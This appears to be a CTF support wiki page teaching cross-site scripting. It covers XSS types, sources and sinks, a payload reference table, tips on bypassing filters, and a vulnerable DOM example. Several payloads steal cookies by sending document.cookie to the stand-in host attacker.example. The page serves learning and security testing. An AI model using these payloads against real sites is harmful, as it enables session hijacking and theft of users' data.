CTF Support
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage
  1. CTF Support
  2. /
  3. Web Exploitation
  4. /
  5. Cross-Site Scripting (XSS)
Edit page

Cross-Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject JavaScript into a webpage viewed by other users. They commonly appear in parameters, forms, or stored data without proper output sanitization.

Types

Type Description
Reflected Payload included in the request and immediately reflected back to the user.
Stored Payload stored permanently on the server (e.g., in a database).
DOM-Based Payload executed in the browser without server interaction by modifying the DOM.

Sources and Sinks

  • Sources - Where user data enters the page logic, such as: location.hash, document.URL, document.referrer
  • Sinks - Where that data is written to the page, like: document.write(), innerHTML, eval(), setTimeout(), Element.innerText

Rule of thumb: Danger arises when untrusted data enters a Source to a Sink without sanitization.

Quick Reference

Context Example Notes
HTML <script>alert(1)</script> Standard test
Attribute <img src=x onerror=alert(1)> Event handler
URL javascript:alert(1) Clickable JavaScript scheme
CSS / Style <div style="background:url(javascript:alert(1))"> Rare but possible
SVG <svg/onload=alert(1)> Common filter bypass

Common Payloads

Basic Proofs of Concept 

<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.cookie)">Click Me</a>

Redirect and log cookie:

document.location = "https://attacker.example/?c=" + document.cookie

Stealth exfiltration via image request:

document.write('<img src="https://attacker.example/collect.gif?cookie=' + document.cookie + '">')

or

<img src=x onerror=this.src='https://attacker.example/?c='+document.cookie>

DOM-Based Example 

var search = location.hash.substring(1); // Source
document.getElementById("output").innerHTML = search; // Sink

Visiting https://target/#<img src=x onerror=alert(1)> executes the script entirely client‑side.

Tips

  • Use the browser’s developer console to observe reflected parameters.
  • Encode payloads for bypass: &lt;script&gt;alert(1)&lt;/script&gt;
  • Bypass filters with alternate encodings or event handlers (onfocus, onmouseover).